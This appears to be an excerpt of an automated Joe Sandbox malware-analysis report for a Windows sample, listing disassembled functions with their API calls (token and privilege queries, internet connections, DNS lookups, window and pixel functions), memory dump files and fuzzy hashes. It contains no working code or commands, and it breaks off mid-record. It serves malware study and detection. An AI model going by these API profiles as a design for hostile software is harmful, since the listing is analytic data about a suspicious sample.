                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: 3b0076615707f29d5953a7b654dddf1c92e54b4874515e6af3289e6e6582122f
                                                                                                                    • Instruction ID: e297d3757039b4b6d57ef433f4f22471024e2bb56795492f40e620352b81ce53
                                                                                                                    • Opcode Fuzzy Hash: 3b0076615707f29d5953a7b654dddf1c92e54b4874515e6af3289e6e6582122f
                                                                                                                    • Instruction Fuzzy Hash: E8319339A10058EFCB278F99C898EEA7BB9EF0B310F044165F9058B261C731AD50DBA4
                                                                                                                    Function 00378656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0037810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00378121
                                                                                                                      • Part of subcall function 0037810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037812B
                                                                                                                      • Part of subcall function 0037810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037813A
                                                                                                                      • Part of subcall function 0037810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00378141
                                                                                                                      • Part of subcall function 0037810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00378157
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003786A3
                                                                                                                    • _memcmp.LIBCMT ref: 003786C6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003786FC
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00378703
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 812b7e34710726d2a2e30e0c49d8baa2c3ce4af1512cd8e272d601c679d7744b
                                                                                                                    • Instruction ID: 37b8a0ed5871c904e4e820cf3a76d8182a7cb99ccb8f4c16ba97a74641ff2336
                                                                                                                    • Opcode Fuzzy Hash: 812b7e34710726d2a2e30e0c49d8baa2c3ce4af1512cd8e272d601c679d7744b
                                                                                                                    • Instruction Fuzzy Hash: 06219071E80108FFDB21DFA4C949BEEB7B8EF45304F158059E548AB240DB34AE05CB60
                                                                                                                    Function 0034098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __setmode.LIBCMT ref: 003409AE
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00387896,?,?,00000000), ref: 00325A2C
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00387896,?,?,00000000,?,?), ref: 00325A50
                                                                                                                    • _fprintf.LIBCMT ref: 003409E5
                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00375DBB
                                                                                                                      • Part of subcall function 00344AAA: _flsall.LIBCMT ref: 00344AC3
                                                                                                                    • __setmode.LIBCMT ref: 00340A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 521402451-0
                                                                                                                    • Opcode ID: ef830669ab3c0affd7abcc0381a031ac8cd433fdf35b8dc28593fc8fee71c149
                                                                                                                    • Instruction ID: 5938c256af40dc73e1977be606cafbc006f1e62ac56e5a54571155cbc3b1ee18
                                                                                                                    • Opcode Fuzzy Hash: ef830669ab3c0affd7abcc0381a031ac8cd433fdf35b8dc28593fc8fee71c149
                                                                                                                    • Instruction Fuzzy Hash: E4112731A042046FDB0BB7B4AC47AFE77EC9F46320F64416AF2045F192EF74694257A5
                                                                                                                    Function 00391767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003917A3
                                                                                                                      • Part of subcall function 0039182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0039184C
                                                                                                                      • Part of subcall function 0039182D: InternetCloseHandle.WININET(00000000), ref: 003918E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: c3007cc5d6b6b1cf4d57d58a2b8b4f79f5f87b94bdbe44192580e3baf93a6f8f
                                                                                                                    • Instruction ID: 0dcdda753aacd01b6453379da28783162af8b5fb044736f1e2baed3905047186
                                                                                                                    • Opcode Fuzzy Hash: c3007cc5d6b6b1cf4d57d58a2b8b4f79f5f87b94bdbe44192580e3baf93a6f8f
                                                                                                                    • Instruction Fuzzy Hash: F921A431204606BFEF139FA0DC41FBBBBADFF49750F10452AF951A6650D7729811ABA0
                                                                                                                    Function 00383A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,003AFAC0), ref: 00383A64
                                                                                                                    • GetLastError.KERNEL32 ref: 00383A73
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00383A82
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003AFAC0), ref: 00383ADF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: 79b8ffd10ac0ca947bbeb969a43f395d69f1d4469bb5be5de5f0b08f38b3f588
                                                                                                                    • Instruction ID: 723f9fd72b27101369d666adb799bf311d2c6b283287cb1dbddea82641141f27
                                                                                                                    • Opcode Fuzzy Hash: 79b8ffd10ac0ca947bbeb969a43f395d69f1d4469bb5be5de5f0b08f38b3f588
                                                                                                                    • Instruction Fuzzy Hash: 7021D1745083018FC716EF28D8818AAB7E8FE16764F104A6DF499C73A1DB31DE46CB82
                                                                                                                    Function 003550E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00355101
                                                                                                                      • Part of subcall function 0034571C: __FF_MSGBANNER.LIBCMT ref: 00345733
                                                                                                                      • Part of subcall function 0034571C: __NMSG_WRITE.LIBCMT ref: 0034573A
                                                                                                                      • Part of subcall function 0034571C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,00000000,?,?,?,00340DD3,?), ref: 0034575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: b2e0202fe1b71154267c329365f02482bd6f4e778889f631973268ec1edf8e92
                                                                                                                    • Instruction ID: 1eb0e48541f2b52bcf81aa515a416db7e0e08e1e89fe5c51f77131e88f2e2d05
                                                                                                                    • Opcode Fuzzy Hash: b2e0202fe1b71154267c329365f02482bd6f4e778889f631973268ec1edf8e92
                                                                                                                    • Instruction Fuzzy Hash: 78119172900E11AFCF332FB4E859B5E3FDC9B153A2F110529FD459E2B1DE30AA449A90
                                                                                                                    Function 00396369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00387896,?,?,00000000), ref: 00325A2C
                                                                                                                      • Part of subcall function 00325A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00387896,?,?,00000000,?,?), ref: 00325A50
                                                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00396399
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003963A4
                                                                                                                    • _memmove.LIBCMT ref: 003963D1
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 003963DC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1504782959-0
                                                                                                                    • Opcode ID: 399d6ebd06437e084e546340ff78ea26e356cd39ba43868f021ce19912069c29
                                                                                                                    • Instruction ID: c72a746fac41cea67a398fe8ed4c453d006bfe166195f0681b0d8d8a3676388b
                                                                                                                    • Opcode Fuzzy Hash: 399d6ebd06437e084e546340ff78ea26e356cd39ba43868f021ce19912069c29
                                                                                                                    • Instruction Fuzzy Hash: 4D113076500119AFCF06FBA4ED86DEEB7BCAF19310B144065F506AB161DB30AE14DB61
                                                                                                                    Function 00378B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00378B61
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00378B73
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00378B89
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00378BA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: e81ecf67b1d52c34cb4982288def29b18ef4636a6a454ff01d6d8a95f82cc320
                                                                                                                    • Instruction ID: 562aadd5ddd18d6a7225541f21d3d02e1ff4130c7edcbe36cf7ce86b749c6a65
                                                                                                                    • Opcode Fuzzy Hash: e81ecf67b1d52c34cb4982288def29b18ef4636a6a454ff01d6d8a95f82cc320
                                                                                                                    • Instruction Fuzzy Hash: 45112E79941218FFDB11DF95CC85F9DBBB8FB48710F204095E904B7250DA716E11DB94
                                                                                                                    Function 00321290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 003212D8
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0035B5FB
                                                                                                                    • GetCursorPos.USER32(?), ref: 0035B605
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0035B610
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4127811313-0
                                                                                                                    • Opcode ID: b7c5a931d776efb9f92e98533eecbef1df93c9da7637ee5749a14b8df9631cb4
                                                                                                                    • Instruction ID: 09a24db2fbd12a711e6991ddfe9c629638da74f3e3a6eead26d0b3ad47c66f9f
                                                                                                                    • Opcode Fuzzy Hash: b7c5a931d776efb9f92e98533eecbef1df93c9da7637ee5749a14b8df9631cb4
                                                                                                                    • Instruction Fuzzy Hash: F9116A35A00129EFCB12DFA8E9859EE77B8EB16300F000855F941E7251C730BA518BA5
                                                                                                                    Function 0037D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0037D84D
                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0037D864
                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0037D879
                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0037D897
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352324309-0
                                                                                                                    • Opcode ID: 8171fe478b0ad215656a267c7350271e8631533f78fc4cba3554bae70aa3f5ce
                                                                                                                    • Instruction ID: 52bede845afd853f5be9a587d1eb59fb87d1427e1d50c5ee4311ccc9d5523a81
                                                                                                                    • Opcode Fuzzy Hash: 8171fe478b0ad215656a267c7350271e8631533f78fc4cba3554bae70aa3f5ce
                                                                                                                    • Instruction Fuzzy Hash: 9A115E75605304EFE3318F91DC48F92BBFCEF04B00F108569A55AD6450D7B4E5499FA2
                                                                                                                    Function 00356FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                    • Instruction ID: 79a9c30a32e352b1f8938ae45dc5133e5b75aee5fe224fe81a53165aeabde601
                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                    • Instruction Fuzzy Hash: C7014C7244814ABBCF175F84EC01CEE3FA6BB18352F598415FE185A071D236C9B9AB81
                                                                                                                    Function 003AB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003AB2E4
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 003AB2FC
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 003AB320
                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003AB33B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    • Opcode ID: 4f0352fd0192017f5e49945bf2ca897092b76aca51fb2a27fe7bff773f23b973
                                                                                                                    • Instruction ID: fb78bbf4c6c1a0115883ad0913bc2299a5972a5537d5756d525800a95d7b3426
                                                                                                                    • Opcode Fuzzy Hash: 4f0352fd0192017f5e49945bf2ca897092b76aca51fb2a27fe7bff773f23b973
                                                                                                                    • Instruction Fuzzy Hash: 191143B9D00209EFDB41CFA9C8849EEFBB9FB19311F108166E914E3220D735AA559F90
                                                                                                                    Function 00386BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00386BE6
                                                                                                                      • Part of subcall function 003876C4: _memset.LIBCMT ref: 003876F9
                                                                                                                    • _memmove.LIBCMT ref: 00386C09
                                                                                                                    • _memset.LIBCMT ref: 00386C16
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00386C26
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48991266-0
                                                                                                                    • Opcode ID: 882dc1439f4b81d33790ca17436e3be2c962d947182103846cbe18e3371f2e6e
                                                                                                                    • Instruction ID: 7b8503bee6cba68b9dea80a88927280ae9a828d535cd9802a357ac09568ebfe5
                                                                                                                    • Opcode Fuzzy Hash: 882dc1439f4b81d33790ca17436e3be2c962d947182103846cbe18e3371f2e6e
                                                                                                                    • Instruction Fuzzy Hash: CEF0543A200200ABCF426F95DC85A4ABB69EF46320F0480A1FE085E227D735E811CBB4
                                                                                                                    Function 00322218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000008), ref: 00322231
                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0032223B
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00322250
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00322258
                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0035BE83
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0035BE90
                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0035BEA9
                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0035BEC2
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0035BEE2
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0035BEED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1946975507-0
                                                                                                                    • Opcode ID: 6ee771f1adfaf610c9c22f638aedf55ef73414fbbd78b30db1d36b62209a0538
                                                                                                                    • Instruction ID: 230139809bffbf3090113338034ae7ea50bbd2804a65314a45c330048bb34d7d
